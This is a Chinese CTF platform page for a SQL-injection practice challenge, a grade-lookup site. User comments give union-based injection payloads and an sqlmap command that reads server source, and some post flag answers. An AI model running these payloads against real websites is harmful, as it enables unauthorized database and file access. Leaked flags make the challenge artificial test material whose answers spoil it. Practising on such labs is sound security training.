成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 10185
提  示:
描  述:
来源山科大ctf
评论
docker0w 10月前

1. sqlmap读文件 --file-read=/var/www/html/index.php 2. 通过源代码得知库为:skctf 表为:fl4g 3. dump即可

回复 3

GS 10月前

这题不错

回复 0

哥哥 11月前

flag{01c89f505e9db1ee17941ad22f53899f}

回复 0

脚本小子admin 1年前

1.判断为字符型,单引号闭合,语句:1' and 1=1 #(正常显示) 和 1' and 1=2 (不显示)# 2.order by 判断数量 3.union 联合注入

回复 1

wugan777 1年前

flag{0ae5f6b4af2192ee4dc59b22f0498715}

回复 0

爱莉希雅 1年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g# 打出就行

回复 4
fwsw 5月前

@17776194915 练习联合查询注入的,要是为了完成也可以sqlmap跑

回复 0

17776194915 1年前

有流程吗大佬

回复 0

2448556817 1年前

dabudai

回复 0

19219659971 1年前

从fl4g里面导出了flag,但说flag错误?

回复 1

134679852d9e5 1年前

启动环境以后网页打不开啊。啊啊啊啊啊!!!!! 退钱!

回复 4

canxue2024 1年前

sqlmap一把梭哈

回复 1

WriteUp

image
harry

2 金币

评分(21)

解题动态

testda 攻破了该题 10分钟前
嗨客111 攻破了该题 6小时前
merrymu 攻破了该题 20小时前
Hehe0619 攻破了该题 1天前
sun03 攻破了该题 1天前
李嘉欣a 攻破了该题 1天前
greatsoviet1917 攻破了该题 1天前
afanda 攻破了该题 1天前
awesome 攻破了该题 2天前
zw210611 攻破了该题 2天前
小白ctf 攻破了该题 3天前
3111055454 攻破了该题 3天前
北城以北 攻破了该题 3天前
Kristina 攻破了该题 3天前
TheSunnyTeens 攻破了该题 4天前
dwx1583 攻破了该题 4天前
ldy465952768 攻破了该题 4天前
M0unT 攻破了该题 4天前
19838129352 攻破了该题 4天前
M4cRe 攻破了该题 4天前
问题反馈